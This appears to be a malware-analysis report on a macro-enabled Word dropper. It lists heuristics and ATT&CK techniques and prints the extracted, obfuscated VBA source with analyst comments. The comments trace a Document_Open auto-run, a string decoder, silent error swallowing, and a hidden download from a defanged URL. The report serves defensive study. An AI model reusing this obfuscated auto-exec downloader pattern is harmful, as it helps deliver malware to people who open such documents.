MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate or Obfuscate
The sample contains a VBA macro that is automatically executed when the document is opened, as indicated by the Document_Open and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. The macro is obfuscated and calls CreateObject and CallByName, which suggests it is designed to download and execute a secondary payload. The macro-enable lure further supports this assessment.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call
-
CallByName call high OLE_VBA_CALLBYNAME — CallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose macro source could not be extracted, where no visible source is available.
-
Macro/content-enable lure medium SE_ENABLE_LURE — Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15770 bytes |
| SHA-256: 4f327a332d825c45652737392b569161ba1b3b5f026a144e0c3ffc29cdb67ada | | | |
Preview script — First 1,000 lines of the extracted script
' Module header as emitted by olevba. The attributes identify this as the
' ThisDocument class module, i.e. the module whose Document_Open handler
' (further down) runs automatically when the document is opened.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Not referenced anywhere in the visible listing, and none of the callees
' below (lNWbDXPZykQjnC, aIazdevr, yPsCNPssGyiOpN, ...) are defined in this
' excerpt. The literal arguments are never reused and the return value is a
' constant, so this reads as padding inserted by the obfuscator — TODO
' confirm against the full extraction before discarding it from analysis.
Private Function OEMWfnTNzNAa(ByVal kEmNZLn As String, ByVal pUQDO As String) As Integer
' Neither parameter is used in the body.
lNWbDXPZykQjnC
xYGCrAfNU = 6891
aIazdevr 4165
yPsCNPssGyiOpN 7578, "QLjTiJyxkvHq3D3xoJ"
' NjIyodZJSVmYfi is undeclared/undefined here; its value cannot be
' determined from this excerpt.
If NjIyodZJSVmYfi Then
qmIeR "Tc5GTfIJ7DdJykponF2TvjzdnDdkq5", True, "CR5nll4nqHu2yZ3XoSjvZjPprOKLz"
WEWJNBAlbfoeL "75yJtcASgwEAVWYHBzmb1UceE92k8L", True
DAUosIn
Else
CcVIZQDGBz 1146
End If
' Constant return; nothing above feeds it.
OEMWfnTNzNAa = 5291
End Function
' Not called from any visible code; all three callees are undefined in this
' excerpt and both parameters are unused. Likely obfuscator padding — TODO
' confirm against the full extraction.
Private Sub hKqOqK(ByVal IfkvY As String, ByVal isEBabzjVW As Integer)
TeWBtwRjPIlabt "EBZ4lSC8U8cOT4AXXC1KYoAir3H", 5222, True
eChsuJzQdyZ
sfYHcObVOTvE 7063
End Sub
' Not called from any visible code. oOHmni, NwkbshfERc and YMGoUeYFXwuwr are
' undefined in this excerpt; whichever branch runs, the function returns the
' same constant string. Likely obfuscator padding — TODO confirm.
Private Function uCazxXMenr() As String
If oOHmni Then
NwkbshfERc
Else
YMGoUeYFXwuwr 2523
End If
' Constant return independent of the branch above.
uCazxXMenr = "1T251UeVLs4ojGYnZX"
End Function
' Auto-execution entry point: Word runs this when the document is opened
' (the OLE_VBA_DOCOPEN heuristic in the report). The local variable and the
' numeric assignment are dead; the only live statement is the call into the
' ZTRLmRY module, which is where the real logic starts.
Private Sub Document_Open()
Dim QuVBLoFVmJ As String
rdYkMVXOybK = 5132
' Hands off to ZTRLmRY.IeltIyKRyTF (defined below in this listing).
ZTRLmRY.IeltIyKRyTF
End Sub
' Not called from any visible code; every callee is undefined in this
' excerpt, both parameters are unused and the return value is the constant
' False. Likely obfuscator padding — TODO confirm against the full
' extraction.
Private Function HVptOfWeqFdD(ByVal ibPzahNpHBa As Integer, ByVal cVprSeCGn As String) As Boolean
ELqtEE 564, 1218, "fYhSanXTOsUyz4G11"
Wujyauj = 5855
LbiswoA 1901, "FZeNvsNzHi9n0IXHl5qfOQMlvIv"
PjwNogbxKJYdhp 7473
AIgTVkicIiowa 238, "jQ2RCZ3flRQoFBoeBw", "csxxOj5E4fAkaVs3SIm6hCznES74xLf"
' Constant return; nothing above feeds it.
HVptOfWeqFdD = False
End Function
' Start of the second module (olevba concatenates modules into one file).
' ZTRLmRY is the module Document_Open calls into.
Attribute VB_Name = "ZTRLmRY"
' Called from IeltIyKRyTF. Passes zmAFY.xCgUgpbq, a constant and the decoded
' string from zuyIhzjGWMJA() into LUmzLGgdHt, then calls a zmAFY method on
' the same xCgUgpbq value. The zmAFY module is not part of this excerpt, so
' what xCgUgpbq holds and what LtQQqEcNTgunYW does cannot be read from here
' — presumably a path and a follow-up action on it; TODO confirm.
' The local and the numeric assignment are dead.
Private Sub HfqHLHZbDWXG()
Dim igRuTIDG As Integer
tkkycPmxl = 7110
LUmzLGgdHt zmAFY.xCgUgpbq, 1503, zuyIhzjGWMJA
zmAFY.LtQQqEcNTgunYW zmAFY.xCgUgpbq
End Sub
' Entry called from Document_Open. Note the error handling: the On Error
' target ymplNbbZN is an empty label directly before End Sub, so any runtime
' error in the three calls below is silently swallowed and the macro exits
' without the dialog an unhandled VBA error would otherwise show the user.
' NanxJOZRPgXjf.yUYnKpy and .LInuQiCINRGQ live in a module outside this
' excerpt; HfqHLHZbDWXG is defined just above.
Public Sub IeltIyKRyTF()
OXCJNgpDtFM = 4891
On Error GoTo ymplNbbZN
NanxJOZRPgXjf.yUYnKpy
NanxJOZRPgXjf.LInuQiCINRGQ
HfqHLHZbDWXG
Exit Sub
' Empty handler: swallow the error and fall out of the procedure.
ymplNbbZN:
End Sub
' Download step reached via Document_Open -> IeltIyKRyTF -> HfqHLHZbDWXG.
' Two string arguments below are obfuscated and decoded at runtime by
' gAdcATNCVnZS.PgkLSbQzzWryIn. That decoder (see its definition further down)
' appears to remove every character of its second argument from its first;
' under that reading the two literals decode to "Can't download binary file"
' (the first call, presumably an error message) and "ResponseBody" (the
' second call, presumably a property name read via CallByName — the report
' flags OLE_VBA_CALLBYNAME). Reconstructed by hand; verify in a sandbox.
' SUmbbGJsrQGlCr.*, JwYwcNCOgCBwx.* and zmAFY.* are not in this excerpt, so
' the object created from GqfmFq and how PmvDNPhbtLk is used cannot be
' confirmed from the listing alone. The local DVrCCocfjsOyZm is unused.
Private Sub LUmzLGgdHt(ByVal PmvDNPhbtLk As String, ByVal hbOnwg As Integer, ByVal GqfmFq As String)
Dim DVrCCocfjsOyZm As Integer
' GqfmFq is the decoded string supplied by the caller (from zuyIhzjGWMJA).
Set OSuWuqT = SUmbbGJsrQGlCr.BIQbSq("7DAiIjyApsFWR2b9rd6tCgQ9hzmH", GqfmFq, "jQy98rK5A8fEjlnT1Uad84cFxu")
SUmbbGJsrQGlCr.CkIEnCkFfLK OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
' Result of reading OSuWuqT is handed to zmAFY.equhCgWhZp together with
' PmvDNPhbtLk (the caller passes zmAFY.xCgUgpbq here).
zmAFY.equhCgWhZp PmvDNPhbtLk, JwYwcNCOgCBwx.RJkrOlROSrZNDx(OSuWuqT, gAdcATNCVnZS.PgkLSbQzzWryIn("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
' Thin wrapper around CreateObject (the OLE_VBA_CREATEOBJ heuristic).
' Returns CreateObject(sdTFLdHw) passed through tvuwZWCvZhgWlH, which simply
' returns its first argument, so the net effect is CreateObject(sdTFLdHw).
' NyEjjJOeppzvOE and both locals are unused; the extra parameter and the
' pass-through only obscure the direct CreateObject call. No caller is
' visible in this excerpt — presumably in a truncated module.
Public Function NeTnC(ByVal NyEjjJOeppzvOE As String, ByVal sdTFLdHw As String) As Object
Dim pXNhOhhlfvQYW As String
Dim JvrVRRrIkDqj As String
' sdTFLdHw is the ProgID string handed to CreateObject.
Set NeTnC = tvuwZWCvZhgWlH(CreateObject(sdTFLdHw), False, False)
End Function
' Identity function: returns jEvgfVKxGMtEx unchanged; the two Boolean
' parameters are ignored. Exists only to add a layer of indirection around
' the CreateObject result in NeTnC.
Private Function tvuwZWCvZhgWlH(ByVal jEvgfVKxGMtEx As Object, ByVal dNBIYwL As Boolean, ByVal LPleCMTEk As Boolean) As Object
Set tvuwZWCvZhgWlH = jEvgfVKxGMtEx
End Function
' Returns the decoded string that HfqHLHZbDWXG passes as the third argument
' of LUmzLGgdHt. Under the strip-key-characters reading of PgkLSbQzzWryIn
' (key "bY9WML") the literal decodes to a download URL,
' hxxp://ravirajit[.]com/catalog/office11[.]dat (defanged). Reconstructed by
' hand from the listing — verify in a sandbox before using it as an IoC.
Private Function zuyIhzjGWMJA() As String
zuyIhzjGWMJA = gAdcATNCVnZS.PgkLSbQzzWryIn("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
' Start of the third module: holds the string decoder used by the sample.
Attribute VB_Name = "gAdcATNCVnZS"
' String decoder used for every obfuscated literal in this listing.
' gwLgQ is the encoded text, tPCdqy the key. The cXfrU helpers are not in
' this excerpt; from the loop shape zcNPzc looks like a length, wVpDPwrVlS
' like a single-character extract at index fQwLCKC, and QQoki like
' concatenation onto the running result — TODO confirm. Each character goes
' through xurZbHiOIAcCvh (below), which yields the character or "", so the
' apparent net effect is "drop every key character from the input"; the
' literals in LUmzLGgdHt and zuyIhzjGWMJA decode to readable text under
' that reading. VqVNGbMrhz is unused; fQwLCKC and mwYnHDX are undeclared
' (no Option Explicit in view), and the loop's start value mwYnHDX is
' defined elsewhere.
Public Function PgkLSbQzzWryIn(ByVal gwLgQ As String, ByVal tPCdqy As String) As String
Dim VqVNGbMrhz As Boolean
For fQwLCKC = mwYnHDX To cXfrU.zcNPzc("JKfPgfJhcKHSbEEA3HLGz9GFQINRMJRh6", gwLgQ)
' Accumulates into the function's own name (VBA return variable).
PgkLSbQzzWryIn = cXfrU.QQoki("qokImbaq3kdd6keZ5NeloJVNPe", PgkLSbQzzWryIn, 8054, xurZbHiOIAcCvh(tPCdqy, cXfrU.wVpDPwrVlS(fQwLCKC, "T2uCee33zvXfolvMcgj", gwLgQ)))
Next
End Function
' Not called from any visible code; every callee is undefined in this
' excerpt, the parameter is unused and the assigned globals are never read
' here. Likely obfuscator padding — TODO confirm against the full
' extraction.
Private Sub kJWXGQFTW(ByVal QYURU As Boolean)
kWQntlSa = "gATjq1CKBKYu2LCuoJRy9mx"
VXJfqbSP 4633, "IvO70p0tZ3UKYSdyaDugrW"
zVAAaHy "wv0kZZuOdF1BBAGfSSqHZB", "foSqSLxBXhwpwpMiHz3R", "ETu5lDkIFxmfvJW2OEpU"
YBsWLiizT = False
jRWGpPV "9OsV7vnTWiDU1mgggGLiMXW8WWs"
OtEdnsXfbIU 7882
wYMGZVuWWXY = 779
HfkDIKvuOvNV
End Sub
' Not called from any visible code; qlgQJwp and NRIoJ are undefined in this
' excerpt and the assigned string is never read. Likely obfuscator padding
' — TODO confirm against the full extraction.
Private Sub PdXPfFkfboaF()
If qlgQJwp Then
NRIoJ
NtQSYMjGdrJNEM = "ldlQ19QhOknTinh7hhONPTc3"
End If
End Sub
' Per-character filter used by PgkLSbQzzWryIn. Returns eLOWeelSAhD unchanged
' when cXfrU.JdYJTAZ(...) is False; otherwise nothing is assigned and the
' function returns VBA's default for a String function, "". JdYJTAZ is not
' in this excerpt — presumably a membership test of the character against
' the key OGbCxSQtjvXeL (the decoded literals come out as readable English
' under that reading); TODO confirm. Both locals are unused.
Private Function xurZbHiOIAcCvh(ByVal OGbCxSQtjvXeL As String, ByVal eLOWeelSAhD As String) As String
Dim rawcsCuVbm As Integer
Dim qOunYEyoWN As String
If Not cXfrU.JdYJTAZ(eLOWeelSAhD, "Ui08UAFZHvMTWDh4YUo", OGbCxSQtjvXeL, 4638) Then
' Keep the character.
xurZbHiOIAcCvh = eLOWeelSAhD
End If
' Otherwise the character is dropped (empty return).
End Function
... (truncated)